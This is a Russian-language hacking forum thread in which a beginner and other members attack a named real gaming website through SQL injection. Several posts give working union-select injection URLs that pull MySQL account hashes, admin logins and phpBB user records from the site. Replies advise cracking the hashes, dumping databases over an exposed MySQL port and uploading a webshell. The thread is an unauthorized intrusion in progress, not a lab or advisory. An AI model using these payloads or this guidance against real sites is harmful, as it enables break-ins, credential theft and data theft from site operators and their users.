![]() |
Вопрос о скуле
При вводе:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/*yroot 31a457464200908a Но при вводе этого логина и паса в http://www.gamersblock.com/admin мне пишет что не правильный пароль. Почему? |
31a457464200908a - не пароль, а хэш MySQL. Это раз. Во-вторых, не факт, что пара от БД подойдет к админке...
|
yroot:31a457464200908a -хеш mysql,бруть его или оставь запрос тут
|
От какого пользователся работает пага? То, что ты выковырял - учётные данные из системного каталога MySQL 4.X. То есть это реквизиты аккаунта суперпользователся для подключения к БД и они НИКАКОГО отношения к админке не имеют (исключая случай, что админ лопух и везде использует одни и те же логин/пароль). Если на их хосте МУСКЛЬ торчит яйцами наружу, то сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных. Но я больше чем уверен, что мускль зацеплен только за localhost. В любом случае - ты можешь попытаться подобрать имена таблицы и столбцов, в которых хранятся реальные данные мемберов сломанной паги. Но если у тебя страничка крутится от root, тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор? |
Цитата:
Цитата:
просто это моя первая скуля, и хочется дальше развиваться в этом направлении |
Подключиться можно с помощью putty, если под виндой сидишь, но, как сказал groundhog, тебя скорей всего ждет облом
|
Цитата:
|
вобщем так:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(USER_LOGIN,0x71),0x71),6,7,8,1,1,1+from+users/*полученные данные скорее всего подойдут к админке (будем надеяться) там еще форум есть phpBB, но кроме Anonymous никакой учетки выдрать неудалось: Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(username,0x71),0x71),6,7,8,1,1,1+from+phpbb.phpbb_users/* |
Цитата:
Цитата:
Цитата:
|
Там в табличке users (не mysql.user) есть пользователь mroca как и пользователь бд, так вот мож его пароль от бд подойдет к админке:
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,1,1,1+from+mysql.user%20where%20user=CHAR(109,114,111,99,97)/*расшифровывай хеш: 3785da1b4f22cdc9 (MySql) и пробуй |
| Время: 21:15 |